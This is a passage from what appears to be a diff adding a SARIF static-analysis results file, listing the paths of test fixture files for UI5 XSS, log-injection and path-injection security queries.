+ } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + }, { + "location" : { + "uri" : 